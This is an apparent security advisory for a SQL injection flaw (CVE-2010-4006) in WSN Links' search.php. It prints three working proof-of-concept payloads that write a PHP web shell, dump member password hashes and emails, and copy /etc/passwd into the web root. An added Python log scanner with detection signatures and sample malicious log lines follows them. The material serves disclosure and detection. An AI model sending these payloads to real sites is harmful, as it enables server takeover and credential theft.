WSN Links SQL injection vulnerability

ID MYHACK58:62201028423
Type myhack58
Reporter Anonymous
Modified 2010-11-26T00:00:00


WSN Links is an advanced PHP/MySQL-based search script. In WSN Links versions < 6.0.1, < 5.1.51 and < 5.0.81, the search.php file contains a SQL injection vulnerability that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav -

[+]poc: ~~~~~~~~~
1) A 'UNION SELECT' which writes a PHP shell-execution script to a file:
   0((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories

2) A 'UNION SELECT' which extracts a member's name, password hash, and e-mail to a file:
   0((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories

3) A 'UNION SELECT' which copies the /etc/passwd file to a file in a web directory:
   0((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories
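For defenders checking whether a site was hit, the following added example (not part of the original advisory or of WSN Links) scans web access-log lines for search.php requests carrying the SQL constructs seen in the PoC requests above, and reports the file path passed in `namesearch` so it can be looked for on disk. It assumes Apache/nginx "combined" log lines; the sample lines are constructed from PoC 2 and 3, and the parameter name `field` is a placeholder because the advisory does not show the name of the injected parameter.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# SQL constructs that appear in the PoC requests quoted in this advisory.
SIGNATURES = {
    "into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}
# "combined" style: client IP first, request line in double quotes.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; `field` is a placeholder parameter name.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Nov/2010:10:00:01 +0000] "GET /links/search.php?action=filter&filled=1&whichtype=categories&namesearch=select+a+category HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Nov/2010:10:00:05 +0000] "GET /search.php?field=0((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories HTTP/1.1" 200 812',
    '203.0.113.9 - - [26/Nov/2010:10:00:09 +0000] "GET /search.php?field=0((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories HTTP/1.1" 200 812',
    '198.51.100.4 - - [26/Nov/2010:10:01:00 +0000] "GET /index.php?note=(select) HTTP/1.1" 200 300',
]


def scan_line(line, script="search.php"):
    """Return a finding dict for a suspicious request to `script`, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if url.path.rsplit("/", 1)[-1].lower() != script:
        return None
    decoded = unquote_plus(url.query)  # %20 and + both become spaces
    hits = sorted(n for n, rx in SIGNATURES.items() if rx.search(decoded))
    if not hits:
        return None
    # In the PoCs the file written by INTO OUTFILE is named in `namesearch`,
    # so report it: responders should check whether that file exists.
    values = parse_qs(url.query).get("namesearch", [])
    paths = [v for v in values if v.startswith("/")]
    return {"client": client, "signatures": hits, "written_paths": paths}


def scan_log(lines):
    """Scan an iterable of access-log lines and return all findings."""
    return [f for f in map(scan_line, lines) if f]
```

A hit only shows that the request was made; whether the write succeeded depends on the database account's FILE privilege and the filesystem permissions on the target directory, so confirm by checking for the reported paths on the server.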

[+]Reference: ~~~~~~~~~